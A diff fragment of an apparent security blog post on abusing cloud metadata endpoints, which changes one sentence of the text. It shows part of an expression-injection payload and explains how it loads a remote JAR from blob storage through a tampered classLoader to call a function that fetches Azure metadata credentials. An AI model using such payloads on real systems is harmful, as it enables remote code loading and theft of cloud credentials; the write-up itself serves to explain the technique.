macagr/macagr.github.io/posts/playing-with-metadata-endpoints.md

 ${dwf.newInstance(curl,null).getMetadataCredentialsARM()}
 ```

 Above, the payload first creates an object from the `classLoader` class from `ProtectionDomain`.
-Then, a list of class URLs is obtained and a tampered list is created by adding the URL to our JAR file which is in a blob storage.
+Then, a list of class URLs is obtained and a tampered list is created by adding the URL to the JAR file which is in a blob storage.
 I then create a new `classLoader` using the tampered URL list and proceed to load the `JavaCurl` class which will then be used to call the `getMetadataCredentialsARM()` function.
 The result of this:

 <p align="center"> <img src="/assets/images/Hack3.png"> </p>